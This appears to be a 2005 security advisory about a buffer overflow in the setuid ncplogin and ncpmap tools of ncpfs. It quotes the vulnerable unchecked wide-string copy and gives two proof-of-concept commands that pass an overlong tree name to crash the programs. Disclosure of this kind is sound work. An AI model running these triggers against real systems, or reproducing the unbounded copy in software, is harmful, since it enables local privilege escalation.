|
Saturday, 10 September 2005 |
Summary
The ncplogin command is used to create a permanent connection to a NetWare server. Permanent connections will stay connected even if no applications use them.
By passing a long tree parameter to ncplogin and ncpmap, it is possible to crash the program and possibly gain higher privileges.
Credit:
The information has been provided by Karol Wi sek.
Details
Vulnerable Systems:
* ncpfs version 2.2.4-1 from fedora core 2
Both ncplogin and ncpmap are installed setuid by default, thus exploitation allows privilege escalation.
Vulnerable Code:
From nwclient.c:
static void strcpy_cw(wchar_t *w, const char* s) {
while ((*w++ = *(const nuint8*)s++) != 0);
}
NWDSCCODE NWDSCreateContextHandleMnt(NWDSContextHandle* ctx, const
NWDSChar * treeName){
...
wchar_t wc_treeName[MAX_DN_CHARS+1];
if (!treeName)
return ERR_NULL_POINTER;
strcpy_cw (wc_treeName,treeName);
Proof of Concept:
The following two command lines will cause the triggering of the vulnerability:
ncplogin -T `perl -e {print"a"x"330"}`
ncpmap -T `perl -e {print"a"x"330"}` / |
